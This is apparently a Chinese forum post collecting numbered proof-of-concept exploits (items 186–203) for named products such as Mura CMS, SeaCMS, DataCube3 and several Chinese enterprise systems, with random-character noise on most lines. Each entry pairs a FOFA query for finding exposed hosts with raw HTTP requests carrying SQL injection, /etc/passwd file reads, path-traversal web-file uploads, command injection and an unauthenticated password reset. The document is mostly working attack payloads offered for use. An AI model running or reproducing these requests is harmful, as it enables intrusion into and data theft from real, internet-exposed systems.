) x6 p. U0 n* Q
$ j0 W$ K% ^ X+ r2 B5 I
186. F-logic DataCube3 SQL注入
( r( ^1 F9 [7 W/ j& QCVE-2024-31750
$ e. x' O: G3 k+ VF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统; B- G. _9 d( x
FOFA:title=="DataCube3"
. K) t6 C7 e! M6 y2 B: v* yPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
$ |) x0 V. S8 V5 P$ K' r/ QHost: your-ip1 m+ J; S2 @; J* g S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
6 |. F% f1 i% Z7 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
" j% p) w# F( W. D9 D3 _; Q G% ~ \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: f- a, N0 ^* G5 Z# ^3 UAccept-Encoding: gzip, deflate
9 T0 H8 N% W' t3 D# [Connection: close' o5 h9 p. V* L+ L0 H6 @$ [) d
Content-Type: application/x-www-form-urlencoded: K5 i% s# v# G
& Q0 ~4 Q8 O2 C; Y4 [* J6 Sreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450+ _: j. _, N y% m
- ]* W, k Y: L2 c2 B N9 ^" M5 B: u2 z# F3 \
187. Mura CMS processAsyncObject SQL注入
Y% a4 h( J" n' k, x% z c# eCVE-2024-32640
' W s' L' t$ }+ M6 D2 CFOFA:"Mura CMS"
8 @9 y) }/ h: O& X* V2 FPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
/ n# L% ?% T: W1 n; P ^Host: your-ip
$ v% t; `$ G2 Y; ^* M! B$ \1 P7 I( gContent-Type: application/x-www-form-urlencoded, J# h1 Q! T7 ?/ k# F( J
( L5 f. P3 t& Q' O0 Q
7 @4 ]" [9 W8 E( C' r9 U, m5 c4 ~object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=12 ?) E# z9 G# `( I5 y9 r* f
* n( g" B# n# |( K8 g1 t- ?% \
! ~1 n7 w" ^2 U9 o
188. 叁体-佳会视频会议 attachment 任意文件读取' h4 f. ?, q# R9 M. b% ^% B
version <= 3.9.70 @4 E) h2 ?4 `6 g
FOFA:body="/system/get_rtc_user_defined_info?site_id"+ Z* b. n9 F. w/ r) o% r
GET /attachment?file=/etc/passwd HTTP/1.19 y/ B% @5 L+ L0 E5 t/ i1 G
Host: your-ip
6 `8 P9 Y% f1 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 y* i# K& Q$ f/ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 h4 ]' i4 _: {* I/ V
Accept-Encoding: gzip, deflate
) H$ Z H3 e9 n8 D" ZAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
. Q% m P! A+ a$ s% Z7 p. [Connection: close
( t+ M# B% R' q3 h" e8 P5 V$ ?% V
8 @8 O7 k2 r9 M6 {( b5 P
) F& b `8 Z3 a/ g: I189. 蓝网科技临床浏览系统 deleteStudy SQL注入; Z" ?. J' R! S+ }
FOFA:app="LANWON-临床浏览系统"9 |2 d+ ]! g/ H/ `9 t& n o
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
3 d( N& W. u6 H% k2 R6 w6 w1 M. rHost: your-ip
2 d* I: [7 K4 r, k: j" CUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 L: s4 W8 C- @- G2 c, O1 n$ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 ?. f! e+ z. FAccept-Encoding: gzip, deflate+ _4 I3 H$ ?0 Y
Accept-Language: zh-CN,zh;q=0.95 Q' T; i/ s1 D! T9 P
Connection: close
% t. [$ S# Q' V
' I- M; _ n- T# \% |) J# T2 P+ v* h) {- d$ v5 R- g. Y
190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 \3 D) f5 t5 Y: Z3 n% U! z: i5 R
FOFA:title=="短视频矩阵营销系统"
) y$ g5 k/ I' U# _POST /index.php/admin/Userinfo/poihuoqu HTTP/2
6 k8 H3 J0 ?, b& y* FHost: your-ip9 c& p; w/ {$ G! k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
6 C+ n) W1 c3 Y+ K" Z2 ]2 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
, t! d4 w2 L2 [Content-Type: application/x-www-form-urlencoded
( P2 }# o5 Y4 _1 M! J, z0 oAccept-Encoding: gzip, deflate D0 u! \0 q+ V3 I$ n+ p+ W- A, g
Accept-Language: zh-CN,zh;q=0.9
4 A( Y* V% V' P8 w3 \1 b5 _
0 {6 w* o! q- I r- y# cpoi=file:///etc/passwd7 i- {0 \) b. V, V+ {* }' @9 c/ J
& x* z1 p, e8 w3 ]- O" r z" F* A) l
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: Y! x% w" g. t Y/ KFOFA:body="/CDGServer3/index.jsp"0 W2 {1 w7 d1 R: [5 H1 w
POST /CDGServer3/js/../NavigationAjax HTTP/1.1- |* e6 g U# o: Y
Host: your-ip
# i% A/ [; J; j; ?% ^- ]6 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 f# a T3 m9 n- o, {
Content-Type: application/x-www-form-urlencoded: |" y5 C7 y8 B3 p/ u
" h, g+ V; @# h' m$ X1 k# X
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
1 G6 }1 }. C" K% i1 ~/ L3 H
' V' @! t9 H: n5 @% v+ k2 G6 d+ g- F* E
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传. B4 p$ K ]7 `9 U
FOFA:title="用户登录_富通天下外贸ERP"% ]' n9 G# d- a6 j* L* f
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1% Q4 b8 k0 x' E
Host: your-ip
! P- R6 D5 @. c. H0 q0 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
$ q3 W" U9 S- I$ ?Content-Type: application/x-www-form-urlencoded, F* V2 `; |; M& M
9 f2 q( r* X# B# W
0 |; Y |4 u _* K" U$ C% m<% @ webhandler language="C#" class="AverageHandler" %>9 J$ ^* _, i' E
using System;: R) M# j& d& v( r, q4 u
using System.Web;! i! T( ]( |% ~
public class AverageHandler : IHttpHandler S% V3 l- \1 G4 k9 `
{& U# U' g& C7 n' Q; Z+ w; }
public bool IsReusable
6 @+ y/ H9 ^* |% {8 R0 t{ get { return true; } }
- ^6 R3 I$ e$ w( k% h6 S! ~8 rpublic void ProcessRequest(HttpContext ctx)
7 s7 i! G+ y! d7 i{
: E* X1 K! i; \ctx.Response.Write("test");
2 X6 `) I, o1 w+ E$ k/ I" e I}
3 M' K y4 i: v" R+ e J}' G- h1 @; G; y" B
- e! Z0 z: Z$ X4 Z% t0 b2 w
0 ?+ o/ {1 X1 U193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
1 X: B: E3 o" w( j8 H7 C# R0 aFOFA:body="山石云鉴主机安全管理系统"$ h! a$ C* n+ ]4 }
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
7 k% C- B& z8 g) h" n/ qHost:
9 H- j3 R" d, v; UCookie: PHPSESSID=2333333333333;
9 g' g7 T }3 x# L+ l- T% ?Content-Type: application/x-www-form-urlencoded
7 A+ Y$ Z+ t6 y# d# \User-Agent: Mozilla/5.0
- \, v0 P$ ^' U# N
' v& O. @8 f6 L" G, x; }' L% H- m) Q7 k1 c. A
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.17 p3 ?/ }9 D" s3 @8 X4 u0 a7 q
Host:- {7 I0 O9 g/ Q
User-Agent: Mozilla/5.0. N5 M+ c% f: k/ T1 y9 O4 L- H
Accept-Encoding: gzip, deflate
# S5 ?) ^8 I! W s6 J GAccept: */*9 ]/ X; X% E# f' @9 |0 d) J
Connection: close
$ ^+ w# _8 w; B) q% B0 \Cookie: PHPSESSID=2333333333333;
9 v9 \) Q7 O: gContent-Type: application/x-www-form-urlencoded$ r6 v. E v4 R, a" q4 }
Content-Length: 84
1 r8 y) t& L, S Y
( a3 b ] n1 Y( _' U( K2 m6 rparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
% R2 U/ Q$ R3 D1 R) {9 N- o
7 e& o8 `6 E" Y5 _: B; k3 n7 l6 F. r8 e
GET /master/img/config HTTP/1.1
+ a' o1 Z% I2 O5 S; R7 W: THost:
4 Q8 q+ e) r& w0 {6 S. {User-Agent: Mozilla/5.0
2 q7 f1 \% G/ b1 F) ~. q
3 e$ t o, }9 c& Q& I* f- _
! _0 g1 q0 c# R- y9 A194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传 x' x Z6 c; `' S8 ]+ c
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
! f1 l Y: { q ~$ s" t4 a( H# Y
. x: Z e/ e4 X8 a4 q7 FPOST /servlet/uploadAttachmentServlet HTTP/1.1) O3 l& p, J1 ]
Host: host
& o8 I1 Q& `8 G: W$ DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36, M8 y) ~: H8 h1 B4 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# C) M" g K8 } j$ |% `: P0 ~1 B g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ I5 F- V4 \: N3 V; c% r: \Accept-Encoding: gzip, deflate
- |% p3 [& J& k) z1 U' S* UConnection: close
, G: P, }' ]; I; ~9 CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk0 y. n9 r! [ C4 }. ]
------WebKitFormBoundaryKNt0t4vBe8cX9rZk1 P2 Y# g% X7 m0 O3 U
3 Y; F* z2 c2 t/ d
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp") I& K: J4 S- q. j0 a/ G8 t2 b2 q
Content-Type: text/plain
% u: f" u _6 c% B$ X2 u<% out.println("hello");%>6 j% l0 _( @7 Z/ C
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
+ r$ v, c3 L: X. Z5 `9 xContent-Disposition: form-data; name="json"' J& K. u3 h( {& m l0 E* N
{"iq":{"query":{"UpdateType":"mail"}}}
* i% v$ D8 n/ i7 }: |------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
6 t% c) o8 w) r) d. h `$ L2 A2 L& A! Q
$ r1 S' l. p: f+ c$ M195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
" V; W5 m9 U0 k7 G4 NFOFA:title=="飞鱼星企业级智能上网行为管理系统# _$ Z- I0 G9 l3 c/ @
POST /send_order.cgi?parameter=operation HTTP/1.1
6 k" C- {) c$ t4 B8 D$ \Host: 127.0.0.1. w! n/ ] z+ L" r& G
Pragma: no-cache- Z7 W2 i3 |/ _7 f& \ _9 B
Cache-Control: no-cache% J: I. T% F$ J* ~" i& p" O m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' Z- f1 `$ i0 R% y6 I& w1 [9 u* b
Accept: */*! a/ @- k3 d/ @9 o4 x* Z
Accept-Encoding: gzip, deflate
{. _ i, w: a0 x1 P# Z3 YAccept-Language: zh-CN,zh;q=0.9
4 Z4 M/ I- ?1 f$ XConnection: close
; Z7 C6 Z; y2 S6 JContent-Type: application/x-www-form-urlencoded
' L. X; C: p: u0 | F! |" HContent-Length: 68
1 [. R% d; d0 V9 x! |9 L
# [0 n* }, l& r, |0 Y{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 e' Y/ j/ |, H1 m8 u
$ q1 F+ y( a/ G4 l
# ~/ ^8 W3 k5 N# ?
196. 河南省风速科技统一认证平台密码重置; j& m- X# {$ ]3 K, h
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
d0 p9 u9 ^" aPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
! ^! h5 l3 U+ ]% B5 m8 `2 k, ?8 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ x6 Z! L8 T4 `Content-Type: application/json;charset=UTF-8
4 a+ T+ @+ q, J6 a7 vX-Requested-With: XMLHttpRequest
5 S+ K4 Z6 l5 v+ m# m5 A* AHost:- N( I/ J7 @, L& |
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 V3 P. A% Q ~
Content-Length: 45
; f3 z: P w: g) ]9 u, _Connection: close
0 C4 J5 e8 t5 @- t! e4 c' n0 o3 t0 k1 x8 s( g: s B( S
{"xgh":"test","newPass":"test666","email":""}* a1 x2 V: n _0 B" B. t
2 K% J+ o4 u5 Q0 m
7 b/ a- k' F* D3 |
A+ j8 {" D; r% o, X
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
' Z) y$ C' w6 p- v4 g+ Y# E% G3 O- SFOFA:app="浙大恩特客户资源管理系统"
1 o; q2 m3 Q& B C8 Z( {GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1$ d- G3 a0 T, I# z4 J' q' N
Host:+ ^6 J% C$ A& V8 _+ n4 R+ M9 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36; [3 w: @# o$ q0 z
Accept-Encoding: gzip, deflate
5 |3 x6 u9 {8 T: k3 V/ }Connection: close
3 s( L. O& h& E; R1 c( Y* Z* f" t a
- V1 S$ _' ^% @8 c$ P6 Y
/ C4 t# y* s4 p- f( ~" D- a b. ~198. 阿里云盘 WebDAV 命令注入8 V5 F! k# g) U
CVE-2024-29640+ `. H- M$ C" t: W- T
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
R# ^: d9 Z) c% ~, kCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
, L0 b$ ?. ~9 o, O0 Y4 W/ SAccept: */*) w! m' r" `7 h5 _9 A* ]
Accept-Encoding: gzip, deflate# [' G2 d- g+ C+ B
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
5 S1 P* O& K5 W$ O0 tConnection: close) i5 W1 A5 i4 _. f# w) _5 }
9 ?4 w/ \( o( K! {) J X( K* \
0 x; T. K( g% t2 O199. cockpit系统assetsmanager_upload接口 文件上传( _ E6 x3 _2 P; @0 k1 ?. `
8 S8 v( p, x) w" p8 Q1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:9 }/ m6 w+ n' m7 w
GET /auth/login?to=/ HTTP/1.1+ S8 o4 C! ^! [. P4 \( \: ]/ `. }
( W+ E0 e/ r1 C6 H J5 K: T
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" X7 R3 m+ I/ T3 S$ ^2 F
6 w' z A' `8 ~( R7 ^2.使用刚才上一步获取到的jwt获取cookie:7 |0 q4 h1 v$ g
4 d& g2 M3 _7 w4 ZPOST /auth/check HTTP/1.1
+ |, O6 j5 p( tContent-Type: application/json
& W9 p* g6 N4 ~% f1 t
- @7 e1 l) S9 t9 \& R1 c5 Q, i: z" L7 v{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}2 n8 V" }5 u0 s* K! X9 v" q" M& ` V
) y; `% M# k3 V3 P
响应:200,返回值:! d7 P u- C9 f
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
. N* i+ {" t5 S/ b$ tFofa:title="Authenticate Please!" f1 p% O- H! J* `* i- [
POST /assetsmanager/upload HTTP/1.1
: {, h; V; M% A; ?& IContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3+ [7 g2 W- X3 r+ O
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92' R* L$ Q8 W5 |8 P2 q
2 \' N( p8 T, \, C/ t ~-----------------------------36D28FBc36bd6feE7Fb3
& C8 J$ R3 b. L! @- I5 uContent-Disposition: form-data; name="files[]"; filename="tttt.php"
, }1 C0 I3 F1 l6 l. WContent-Type: text/php
& t, F1 }- S6 s; _2 D1 f0 i( {8 L/ q# |- G+ ?, D9 P! l
<?php echo "tttt";unlink(__FILE__);?>7 {. [! f: {/ b/ C/ t# I+ N+ A7 x/ k3 O& K
-----------------------------36D28FBc36bd6feE7Fb3
1 @, {" \4 v; Q2 T1 n/ h6 U1 [Content-Disposition: form-data; name="folder" e% o1 j4 _5 l0 j' X6 M
8 F7 c, Y2 h- X-----------------------------36D28FBc36bd6feE7Fb3--% ^6 S. \; } C
! T3 G. z7 c3 L7 d/ |/ J; {+ C+ }4 k) D9 r7 J
/storage/uploads/tttt.php
\; w- {( [: \: h+ Z# d5 {' `+ e
200. SeaCMS海洋影视管理系统dmku SQL注入) H9 a1 e8 J; v/ E) V" b3 w
FOFA:app="海洋CMS"- l8 f& u' [, ?9 l
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
7 k) N/ w" P% m% b2 q4 l' i* K5 cCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s. @5 B1 g8 j+ s
Upgrade-Insecure-Requests: 1" K# u7 D. |" Y$ S* @
Cache-Control: max-age=0
6 }" z( K; b% c) q' GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 c( X" g: b/ [! ^/ u+ J5 cAccept-Encoding: gzip, deflate
8 ?! T3 ^2 o6 Z% n+ ]6 wAccept-Language: zh-CN,zh;q=0.96 H$ @+ j2 \, y5 l0 Z, z
9 Z. x9 C4 g3 e h9 B% O
# `" C0 [# y5 x' H" n2 d8 n201. 方正全媒体新闻采编系统 binary SQL注入4 }3 l. E* y" Z1 s9 S& ^3 E
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"% t. l' |+ P5 \
POST /newsedit/newsplan/task/binary.do HTTP/1.1* r: U& E4 ~- n) C+ H
Content-Type: application/x-www-form-urlencoded, E0 K4 _1 Y4 o/ J j1 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ Z! S; v4 n3 \& a
Accept-Encoding: gzip, deflate' W" v6 W: X; h8 G: a. h/ q
Accept-Language: zh-CN,zh;q=0.93 }* @7 m* Z9 `% }9 }, d4 w$ k% e1 b# C
Connection: close6 r; X9 E9 G2 D0 q* Y1 I# U, l( V
9 Q4 r t. A1 h$ X: r+ W3 ]) D3 dTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
c' B+ \( E( } b! a2 C" g& l! z, k6 v c) [1 l8 m/ z
) G+ n6 ^9 ^( j4 w) E/ D202. 微擎系统 AccountEdit任意文件上传
: R! `5 V1 g2 [+ \* eFOFA:body="/Widgets/WidgetCollection/"8 ?$ L1 e; @, J2 ], a) e Z# [
获取__VIEWSTATE和__EVENTVALIDATION值
) u3 H( h8 f( D& u( J2 IGET /User/AccountEdit.aspx HTTP/1.1
" e" `4 T; u# \- B# i7 FHost: 滑板人之家
/ P# r8 _0 J) n% IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31' l4 A1 V( P: k5 I }9 V8 S+ C
Content-Length: 0. ?' v! {: u5 S% A& Y8 j
- }2 v' q# U$ w8 J6 F! A1 M1 t. m
& S9 x2 T7 I% ~9 d, P( J: B
替换__VIEWSTATE和__EVENTVALIDATION值
+ x" Q# E# F+ BPOST /User/AccountEdit.aspx HTTP/1.1+ }. v+ y5 m0 g. g0 _
Accept-Encoding: gzip, deflate, br& e. U3 S8 ?" |
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
* G. ^8 t# e' ?4 U- K9 B6 v+ \% g1 J" v
-----------------------------786435874t38587593865736587346567358735687
5 w% x+ p+ ?( u3 H$ L; q7 D9 H" {5 SContent-Disposition: form-data; name="__VIEWSTATE"5 |6 `/ b4 t. B6 B! f
; i. H! M+ }, W" v
__VIEWSTATE' z* G- G0 i @0 g+ r0 [! S/ P
-----------------------------786435874t385875938657365873465673587356872 r- [5 @4 _ X
Content-Disposition: form-data; name="__EVENTVALIDATION"1 U& D, a& Y5 {, F* _
5 M7 L9 `- U: p2 i6 d__EVENTVALIDATION' j1 u( `9 Y/ {0 z& Z" X+ d3 T0 g
-----------------------------786435874t385875938657365873465673587356874 _, K3 U2 v* a
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"' I6 j, x6 X5 S8 V8 J
Content-Type: text/plain
5 R4 k! ^: @) o: b; G* }" B+ M/ J7 m& B+ H& X( Y
Hello World!, F1 n" x6 i1 n! |8 t
-----------------------------786435874t38587593865736587346567358735687! q6 R1 M5 I+ @- N M
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
2 m+ d4 X5 R- N. O- a
4 f4 r; \) \ \5 e* ~1 t) L上传图片
9 n+ T+ q7 m& o/ w! n-----------------------------786435874t38587593865736587346567358735687
& k* R+ ]5 t( Q# J8 K* h9 | rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"3 @, m$ k2 L1 E- [0 {; t
/ x. ?* }0 h/ x2 v; y
" Q) r, }$ z6 T" c6 t4 J& p) p
-----------------------------786435874t38587593865736587346567358735687
% X( c! F1 `; U( L& e( EContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"0 G: V1 K9 B5 |. Z& I
1 s+ z Q) d% j* V6 s/ d
8 |0 w7 m" _1 n5 q, j-----------------------------786435874t38587593865736587346567358735687--7 M5 y$ u0 M2 d% O4 F p
( z# x: N" d' f. l `
( A# G0 N! J# J7 o# I4 F/ [/_data/Uploads/1123.txt
6 V$ m D/ s$ X, j* b% u
7 l5 [" q7 y: Z) `4 A203. 红海云EHR PtFjk 文件上传- p: [* R: ]' Z! p9 x, `1 h
FOFA:body="RedseaPlatform") Q* b5 |6 Q; Z* I
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1. r( B; v) L$ [+ h/ b# U
Host: x.x.x.x' K( V, }% {# a, \9 j4 s: Z$ y
Accept-Encoding: gzip
, S/ _; I+ l! dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ g- _* {- a0 C8 _Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
" U# e9 F8 V h+ f0 _$ eContent-Length: 210
# g& `2 t* t5 R7 s* f9 X. N' j; I: S, R' k3 `- h# h
------WebKitFormBoundaryt7WbDl1tXogoZys4
9 C7 C" i6 U1 s2 ~" K: m$ N7 F/ YContent-Disposition: form-data; name="fj_file"; filename="11.jsp") E1 t6 U: x. i4 B9 x7 g: V
Content-Type:image/jpeg
" Y$ ~# K9 B4 n* `9 P( d% ~3 A* n2 T1 p
<% out.print("hello,eHR");%>
) }4 a, |- N: z; Z" h! `( d------WebKitFormBoundaryt7WbDl1tXogoZys4--
5 D( r; W) _, U8 `* C
9 z g6 f6 f! V& ?) P$ ^2 R
: t" V/ N- L8 P7 s; e6 }+ U
* Q' [. o6 e9 @3 ~& f
6 x( K( a6 Q, i
" m) ^% K. h# l
; ` s4 p( Y% @6 ~ |
发表于 2024-6-5 14:31:29
收藏
支持
反对